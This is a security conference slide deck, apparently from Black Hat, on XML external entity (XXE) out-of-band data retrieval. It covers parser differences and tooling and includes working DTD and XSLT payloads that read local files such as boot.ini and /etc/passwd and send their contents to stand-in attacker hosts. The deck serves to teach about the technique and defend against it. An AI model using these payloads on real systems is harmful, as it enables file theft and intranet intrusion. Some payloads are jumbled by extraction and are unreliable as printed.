Black Hat: XML Out-Of-Band Data Retrieval

XML Out-Of-Band Data Retrieval

Timur Yunusov
Alexey Osipov

Who we are
• Timur Yunusov:
– Web Application Security Researcher
– International forum on practical security «Positive
Hack Days» developer
• Alexey Osipov:
– Attack prevention mechanisms Researcher
– Security tools and Proof of Concepts developer
• SCADA StrangeLove team members

Agenda
• XML Overview
• XML eXternal Entities
• Entities in attributes
• Out-Of-Band attack
– DTD
– XSLT
• Summary
• Demos
• Questions

XML overview
• Very popular protocol lately
– Serialization
– SOA-architecture (REST, SOAP, OAuth)
– Human-readable (at least intended to be)
• Many parsers/many options controlling
behavior (over 9000)
• Many xml-extensions like XSLT, SOAP, XML
schema

XML overview
• Many opportunities lead to many
vulnerabilities:
– Adobe (@agarri_fr, spasibo)
– PostgreSQL (@d0znpp), PHP, Java

• Many hackers techniques

XML entities
• Entities:
– Predefined & < %
– General <!ENTITY general “hello”>
– Parameter <!ENTITY % param “hello”>
• General and parameter entities may be:
– Internal (defined in current DTD)
– External (defined in external resource)

XXE impact
• Local file reading
• Intranet access
• Host-scan/Port-scan
• Remote Code Execution (not so often)
• Denial of Service

XXE techniques
• XML data output (basic)
• Error-based XXE
– DTD (invalid/values type definition)
– Schema validation
• Blind techniques
– XSD values bruteforce (@d0znpp)

Error based output
• Schema validation In Xerces
parser error : Invalid URI: :[file]
I/O warning : failed to load external entity"[file]“
parser error : DOCTYPE improperly terminated
Warning: *** [file] in *** on line 11
<!DOCTYPE html[
<!ENTITY % foo SYSTEM "file:///c:/boot.ini">
%foo;]>

XML constraints
• XML validity/well-formedness
– WFC: No External Entity References … in attributes
– WFC: No < in Attribute Values
– WFC: PEs in Internal Subset

Parameter entities
resolve/validation algorithm
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html [
<!ENTITY % internal SYSTEM "local_file.xml">
%internal;]> "Hello, World!"> ]>
<!ENTITY title
<html>&title;</html>

local_file.xml:
<!ENTITY title "Hello, World!">

XXE attacks restrictions
• XML parser reads only valid xml documents
– No binary =(
(http://www.w3.org/TR/REC-xml/#CharClasses)
– Malformed first string (no encoding attribute)
(Some parsers)
– But we have wrappers!
• Resulting document should also be valid
– No external entities in attributes

System entities restrictions
bypass within attributes
Well-formed constraint:
– No External Entity References
• So, this is not possible, right?
<!DOCTYPE root[
<ENTITY internal SYSTEM "file:///etc/passwd">
]>
<root attrib="&internal;“/>

System entities restrictions
bypass within attributes
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://evilhost/evil.xml">
%remote;
<!ENTITY internal '[boot loader] timeout ***'>
%param1; ]>
<root attrib="&internal;" /> Evil.xml

<!ENTITY % payload SYSTEM "file:///c:/boot.ini">
<!ENTITY % param1 "<!ENTITY internal '%payload;'>">

Pattern validation
<xs:restriction base="xs:string">
<xs:pattern value="&test;" />
</xs:restriction>

XXE attacks restrictions
Server-side in general (except Adobe XXE SOP
bypass)

XXE OOB
What other OOB communication techniques are
present?
DNS exfiltration via SQL Injection (@stamparm)
UTL_HTTP.REQUEST
xp_fileexist
Dblink
LOAD_FILE

XXE OOB
<!DOCTYPE root SYSTEM
<!DOCTYPE root [
“http://evilhost/xml.xml”>
<!ENTITY % remote SYSTEM "http://evilhost/evil.xml">
<root>
&trick;
%remote;
</root>

<!ENTITY % trick SYSTEM 'http://evil/?%5Bboot%20'>
%int;
%trick;]> Evil.xml
<!ENTITY % payl SYSTEM "file:///c:/boot.ini">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'http://evil/?%payl;'>">

XXE OOB

DTD
Parsing, SYSTEM
reading

XML
Attacker Server

PROFIT!

Parsing restrictions
• Beside restrictions of all entities there are also
new ones
• “PEReferences forbidden in internal subset”
(c) XML Specification
– So we should be able to read some external
resource (local or remote)
– Wrappers

Parsing restrictions
• Quotes are blocking definition of entities
– One should try single/double quotes when
defining entity
<!ENTITY % int "<!ENTITY % trick ‘*file
content’+’>"
• Space/new line/other whitespace symbols
should not appear in URI
– Wrappers again =)
– Or not even needed

Vectors
• Depending on parser features – lack of DTD
validation in main document doesn’t mean
lack of validation everywhere. Some possible
clues:
– External DTD or Internal DTD subset from external
data
– Parameter entities only
– XSD Schema
– XSLT template

Vectors
• <!DOCTYPE root SYSTEM “…”>
• <!ENTITY external PUBLIC “some_text” “…”>
• <tag xsi:schemaLocation=“…”/>
• <tag xsi:noNamespaceSchemaLocation=“…”/>
• <xs:include schemaLocation=“…”>
• <xs:import schemaLocation=“…”>
• <?xml-stylesheet href=“…”?>

XSLT OOB
• Controlling XSLT transformation template we
can access some data from sensitive host:
<xsl:variable name="payload"
select="document('http://sensitive_host/',/)"/>
<xsl:variable name="combine"
select="concat('http://evilhost/', $payload)"/>
<xsl:variable name="result"
select="document($combine)" />

XSLT OOB
• Depending on available features we can:
– Get non-xml data using “unparsed-text” function
– Enumerate services/hosts with “*-available”
functions
– With substring() we can craft such DNS
hostname, that will let us obtain some sensitive
data via malicious DNS request to our server

Vectors

WAT R U
XML DOIN?

XML STAHP!

XXE OOB Profit
• Server-side
– Send file content over DNS/HTTP/HTTPs/Smb?
– Without error/data output
• Client-side products
– Nobody has ever tried to hack oneself ;)
– Lots of products…

Parsers diff – MS with System.XML
• Pros:
– URL-encodes query string for OOB technique
– Saves all line feeds in attributes
• Cons:
– Can’t read XML files without encoding declaration
(we can still read Web.config .NET)
– No wrappers (except system-wide)

Parsers diff – Java Xerces
• Pros:
– Can read directories!
– Sends NTLM auth data
– Different wrappers
• Cons:
– Converts line feeds to spaces when inserting in
attribute
– Can’t read multiline files with OOB technique

Parsers diff – libxml (PHP)
• Pros
– Wrappers! (expect://, data://)
(http://www.slideshare.net/phdays/on-secure-
application-of-php-wrappers)
– Most liberal parsing ???
• Cons
– Can’t read big files by default (>8Kb)

Parsers diff
MS System.XML Java Xerces Libxml (PHP)
External entity in Line feeds are
attribute value + converted to spaces +
OOB
read multiline + – +
OOB Option is often
read big files + + enabled

Directory listing – + –
Validating schema
location – + –

Tools
XXE OOB Exploitation Toolset for Automation
• DNS knocking
• Vectors set
• HTTP Server

Tools
Metasploit module (special thnx2 @vegoshin)
• Vector set and HTTP server provided to you in
your MSF ;-)

Conclusions

• General ruination? ;-)
• Toolset
• New ideas for new vectors and
applications

Special greetz

• Arseniy Reutov
• Ilya Karpov
• Mihail Firstov
• Sergey Pavlov
• Vyacheslav Egoshin

Questions?

www.scadastrangelove.org
@GiftsUngiven
@a66at

Black Hat: XML Out-Of-Band Data Retrieval

More Related Content

What's hot (20)

Similar to Black Hat: XML Out-Of-Band Data Retrieval (20)

More from qqlan (20)

Black Hat: XML Out-Of-Band Data Retrieval